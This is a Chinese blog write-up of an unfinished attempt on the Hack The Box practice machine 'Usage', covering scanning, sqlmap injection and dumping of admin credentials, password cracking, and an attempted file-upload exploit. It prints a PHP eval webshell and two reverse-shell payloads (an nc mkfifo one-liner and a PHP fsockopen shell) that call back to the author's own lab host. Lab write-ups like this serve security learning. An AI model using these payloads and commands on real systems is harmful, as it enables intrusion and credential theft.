HTB靶场1 Usage

已于 2024-04-25 11:08:18 修改
阅读量1.1k 收藏 10
点赞数 4
分类专栏: DC靶场 文章标签: 安全
于 2024-04-18 00:19:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62438849/article/details/137792496
版权

可以参考这个Hack The Box - 如何开始。 - Black--Horse - 博客园 (cnblogs.com)

点击machines 选择Usage  点击Edit connection

下载文件.ovpn

把下载的文件复制到kali

然后 sudo openvpn 文件.ovpn

查看 ifconfig 可以看到自己的ip和网站给的ip符合

也可以看到 靶机ip 10.10.11.18

nmap扫描 22、80端口

访问网站看一下

本来我输入的ip  却出现了域名

然后我在/etc/host加了一个ip和域名对应关系

网页是这样的

插件查看服务器版本信息

用的框架是Laravel

现在需要上传shell ,那就需要找到漏洞

点击admin发现

又在/etc/host添加10.10.11.18   admin.usage.htb

访问

Usage网页我随便注册了个账户,可以登录

有一些精选博客的内容,说了一些网络渗透之类的

隐藏目录扫描,

dirb http://xxx

看到这么多表单(各种登录、输入框,可能有sql注入)

点击重置密码处 然后抓包

输了个1 ,会提示这个邮箱,在数据库记录里不匹配

可以知道,这个输入框的名称是 email

用sqlmap

sqlmap -u "http://usage.htb/forget-password"  --level 5 --risk 3 --data "email=1" --batch

说没有注入

换一个方法

抓包的结果右键保存到文件

sqlmap -r package2 --level 5 --risk 3 -p email --batch

确实有sql注入

列数据库

sqlmap -r package2 --level 5 --risk 3 -p email --dbs --batch

速度有点慢加上 --threads 10

列出 usage_blog数据的表

sqlmap -r package2 --level 5 --risk 3 -p email -D  usage_blog --tables --threads 10 --batch 

列出表的字段  admin_users

sqlmap -r package2 --level 5 --risk 3 -p email -D  usage_blog -T admin_users --columns  --threads 10 --batch

如果直接复制语句,可能出现有些选项不是蓝色 ,有些参数不应该是蓝色,可以增加再删除空格

实在是太慢了,就不等它列完

列出username,password的值

sqlmap -r package2 --level 5 --risk 3 -p email --batch -D usage_blog -T admin_users -C username,password --dump --threads 10

hydra 靶机ip ssh -f -L pass.txt -P pass.txt -t 20   用于ssh密码爆破

john  pass.txt 暴力破解密码

得到密码 whatever1

登录网页 可以看到具体的版本信息 Laravel version  10.18.0

看一下有无版本漏洞 好像是没有

参考其它博客的  有漏洞CVE-2023-24249 CVE-2023-24249 | flyD

Laravel-Admin是Laravel的管理界面生成器,它可以帮助您只用几行代码即可构建CRUD后端。Laravel-Admin V1.8.19中的任意文件上传漏洞允许攻击者通过精心制作的PHP文件执行任意代码

上传图片,后缀名添加.php ,未上传成功

一句话木马<?php @eval($_POST['123']);?> 但这个要用蚁剑连接 不用它

ip是自己kali的ip 因为是反向连接

可以用这个

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 7777 >/tmp/f

我用到下面这个

<?php $sock = fsockopen("10.10.14.12", "6666"); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, $pipes); proc_close($process);?>

创建文件

上传

抓包修改  文件后缀名加上.php

监听nc -lvp 6666

但是我的抓包后发送,网页是419

然后我上传一张正常的图片也是419

总之就是头像上传不成功,上传不了shell

后面的内容也没法做了

参考:

HTB - Usage | My Pentest Book (gitbook.io)

MOMO8849
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HTB靶场系列】Bastard
Ms08067安全实验室
07-28 235
点击星标,即时接收最新推文#01实验信息靶机:10.10.10.9Kali:10.10.16.2#02实验过程靶机打开的端口很少,接下来扫描端口的详细信息根据信息可以得出靶机是IIS搭建的,网站有robots.txt里面有很多可用信息接下来 再对靶机进行 常用漏洞脚本扫描 以及 常见UDP端口扫描,没有什么出现其他的可用信息那么这里的突破口就主要就是80端口通过刚刚nmap的扫描结果得出靶机用的是...
HTB靶场 Shared
weixin_45682839的博客
08-22 2138
HTB靶场shared靶机通关攻略记录,涉及知识点包括:端口服务扫描、sql注入(cookie)、linux提权(ipython越权漏洞、redis逃逸漏洞)
Usage - hackthebox
tanbinn的博客
05-31 1199
hackthebox的Usage靶场
[Meachines][Easy] Usage
04-18 1147
#SQLI #CVE-2023-24249 #monitrc #ln #7za
Linux/Usage
ve9etable的博客
04-22 964
首先使用 nmap 默认配置扫描系统端口对外开放情况,发现对外开放了 22 和 80 端口,然后又扫描了这两个端口的详细信息,情况如下可以看到 80 端口运行着 http,使用了 nginx,并且提示无法访问 http://usage.htb,将域名添加至 /etc/hosts 文件中。
htb
03-11
相关项目。
HTB单线策略测试
08-18
1. **配置层次结构**:HTB的层次结构由父类和子类构成,每个类有自己的令牌桶,可以通过设定不同的令牌生成速率来控制其带宽。测试时,我们需要确保层次结构的正确设置,以实现预期的带宽分配。 2. **带宽限制与...
ROS PCQ HTB.rar
10-23
1. **ROS网络架构**:ROS网络由节点、话题、服务和参数等组件构成。节点之间通过TCP或UDP协议进行通信,话题是节点间共享数据的主要方式,而服务则用于请求-响应式的交互。 2. **ROS通信效率**:由于机器人系统通常...
ros脚本HTB+PCQ
01-05
1. **定义类**:创建不同优先级的数据流类别,例如,高优先级的游戏流、中优先级的视频流和低优先级的普通下载流。 2. **分配带宽**:为每个类分配相应的带宽资源,如将大部分带宽分配给游戏类,其余分配给视频和...
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
一点硬件
08-20 270
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
ChaCha20:高效且安全的流密码算法
最新发布
jiamisoft的博客
08-23 291
ChaCha20作为一种现代流密码算法,以其高速性能和良好的安全性,在信息安全领域占据了一席之地。随着技术的发展,ChaCha20将继续在保护数据安全方面发挥重要作用。同时,随着量子计算技术的进步,我们也需要关注ChaCha20等现有加密算法在量子时代的安全性,并积极探索新的加密技术。
SD-WAN安全:在灵活性与安全性之间找到平衡
A526847的博客
08-21 417
随着企业业务的不断扩展和数字化转型的加速,网络架构的灵活性和安全性成为了企业关注的重点。SD-WAN(软件定义广域网)作为一种新兴的网络架构,通过软件定义和虚拟化技术,为企业提供了更灵活、可靠、经济高效的广域网连接方案。然而,在追求灵活性的同时,如何确保网络的安全性,成为了SD-WAN应用中的一大挑战。本文将探讨SD-WAN如何在灵活性与安全性之间找到平衡。
趋势分享|Gartner解读中国企业容器管理新挑战:混合环境、容器安全、AI支持
SmartX 超融合
08-20 943
容器管理不应止于“管理容器”。
【闪送-注册安全分析报告】
08-20 1218
闪送作为快递行业知名的头部企业,在点对点送达业务占据很大的市场份额,拥有雄厚的技术实力,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“
API容易被攻击,如何做好API安全
dexunyun的博客
08-20 799
当前,API已成为全球重要 IT 基础设施的基石。由此,了解API安全风险以及采用WAAP解决方案等防护措施等,帮助企业构筑API安全防线,确保API安全,为维护企业安全以及业务的正常运行,确保企业可持续发展有着重要的意义。
网安新声 | 从微软“狂躁许可”漏洞事件看安全新挑战与应对策略
WAJXY2021的博客
08-20 305
“狂躁许可”被视为继“永恒之蓝”之后,Windows上出现的又一里程碑式漏洞,其全版本影响范围与高度稳定的利用特性,再次敲响了网络安全领域的警钟。
信息系统安全等级划分及其重要性:构建安全基石
w13359990065的博客
08-23 309
我国的“信息系统安全等级保护制度”正是在这一背景下应运而生,旨在通过等级划分,为不同级别的信息系统提供适配的安全保护措施,确保信息资产的安全可控。3. 促进业务发展:确保信息系统的安全运行,不仅能够保护企业免受信息安全事件的冲击,还能够提升客户和合作伙伴的信任,促进业务的持续稳定发展。在数字化转型的浪潮中,企业应将等级划分作为信息安全建设的出发点,通过科学合理的安全防护措施,为业务的持续发展提供坚实的信息安全保障。4. 第四级(强制保护级):适用于对国家安全、社会秩序、公共利益构成特别严重损害的信息系统。
网络安全简介(入门篇)
不甘于平凡的溃败的博客
08-18 1058
博主现从事网络安全行业,在工作之余自己从网上、书籍以及自己总结出一些关于网络安全的知识,本文采用理论和实践相结合方式进行讲解,首先对网络安全进行理论介绍,最后再结合一个安全渗透小案例实践讲解;特分享给大家,供从事计算机软件、网络信息安全领域以及网络安全爱好者学习、交流。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值